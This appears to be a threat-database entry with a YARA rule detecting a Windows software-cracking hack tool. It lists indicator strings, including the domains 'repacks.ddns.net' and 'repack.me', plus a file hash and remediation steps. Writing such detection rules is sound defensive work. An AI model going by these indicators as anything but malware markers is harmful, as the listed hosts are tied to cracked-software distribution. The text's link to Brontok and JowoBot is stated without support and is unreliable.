Concrete signature match: Hack Tool - Tool used to exploit vulnerabilities for 32-bit Windows platform, family Crack
This concrete detection identifies a hack tool designed to bypass software protection. It carries significant risk, as it's strongly associated with known malware families like Brontok and JowoBot, potentially facilitating information theft and botnet activities.
Relevant strings associated with this threat:
```yara
rule HackTool_Win32_Crack_2147745913_0
{
    meta:
        author = "threatcheck.sh"
        detection_name = "HackTool:Win32/Crack!MTB"
        threat_id = "2147745913"
        type = "HackTool"
        platform = "Win32: Windows 32-bit platform"
        family = "Crack"
        severity = "High"
        info = "MTB: Microsoft Threat Behavior"
        signature_type = "SIGNATURE_TYPE_PEHSTR_EXT"
        threshold = "6"
        strings_accuracy = "High"
    strings:
        $x_2_1 = "RarExtInstaller.pdb" ascii //weight: 2
        $x_1_2 = "C:\\NeverShow.txt" ascii //weight: 1
        $x_1_3 = "OnClick" ascii //weight: 1
        $x_1_4 = "repacks.ddns.net" ascii //weight: 1
        $x_1_5 = "repack.me" ascii //weight: 1
        $x_1_6 = "Activation" ascii //weight: 1
    condition:
        (filesize < 20MB) and
        (
            ((1 of ($x_2_*) and 4 of ($x_1_*))) or
            (all of ($x*))
        )
}
```

SHA-256: c3d568da2c0055824bfc629de90970014fe15164693f7acc478dc7e06891516f

Isolate the affected system, perform a comprehensive antivirus scan to remove the threat and any associated malware, and educate users on avoiding unauthorized software sources.